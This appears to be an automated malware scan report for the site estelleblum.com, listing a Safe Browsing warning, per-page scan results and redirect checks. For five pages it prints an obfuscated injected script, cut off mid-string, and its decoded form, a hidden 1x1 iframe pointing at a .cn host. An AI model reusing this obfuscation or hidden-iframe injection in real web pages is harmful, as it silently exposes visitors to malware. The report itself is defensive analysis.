Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=estelleblum.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://estelleblum.com/ | 200 OK Content-Length: 3930 Content-Type: text/html | clean |
http://estelleblum.com/page%206.htm | 200 OK Content-Length: 6791 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca Decoded script: <iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe> Antivirus reports:
| ||
http://estelleblum.com/bahamas.htm | 200 OK Content-Length: 4459 Content-Type: text/html | clean |
http://estelleblum.com/test404page.js | 404 Not Found Content-Length: 396 Content-Type: text/html | clean |
http://estelleblum.com/page%2016.htm | 200 OK Content-Length: 6934 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca Decoded script: <iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe> Antivirus reports:
| ||
http://estelleblum.com/Page%201.htm | 200 OK Content-Length: 7048 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca Decoded script: <iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe> Antivirus reports:
| ||
http://estelleblum.com/page%209.htm | 200 OK Content-Length: 6829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca Decoded script: <iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe> Antivirus reports:
| ||
http://estelleblum.com/page%203.htm | 200 OK Content-Length: 6815 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) document.write(''+'<if'+unescape('%72%61%6D')+unescape('%65')+' i'+unescape('%64')+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(53)+''+String.fromCharCode(102)+String.fromCharCode(50)+String.fromCharCode(97)+''+'63a'+unescape('%63%33')+'fb'+String.fromCharCode(100)+''+'1c6b'+unescape('%31%32%64')+String.fromCharCode(100)+String.fromCharCode(51)+''+unescape('%62%65')+String.fromCharCode(52)+String.fromCharCode(56)+String.fromCharCode(55)+String.fromCharCode(53)+''+unesca Decoded script: <iframe id="5f2a63ac3fbd1c6b12dd3be48750454a" name="bbe18092908048f868834694443ed50f" width=1 height=1 frameborder=0 src="http://bestfindahome.cn/home.html"></iframe> Antivirus reports:
| ||
http://estelleblum.com/nagrody/green.htm | 200 OK Content-Length: 4740 Content-Type: text/html | clean |
http://estelleblum.com/nagrody/rates.htm | 200 OK Content-Length: 4784 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: estelleblum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:41:07 GMT
Accept-Ranges: bytes
ETag: "298e400-f5a-4c9c2ec1cee40"
Server: Apache
Content-Length: 3930
Content-Type: text/html
Last-Modified: Sat, 15 Sep 2012 19:55:29 GMT
...3930 bytes of data.
GET / HTTP/1.1
Host: estelleblum.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 13:41:07 GMT
Accept-Ranges: bytes
ETag: "298e400-f5a-4c9c2ec1cee40"
Server: Apache
Content-Length: 3930
Content-Type: text/html
Last-Modified: Sat, 15 Sep 2012 19:55:29 GMT
...3930 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: estelleblum.com
Referer: http://www.google.com/search?q=estelleblum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: estelleblum.com
Referer: http://www.google.com/search?q=estelleblum.com
Result:
The result is similar to the first query. There are no suspicious redirects found.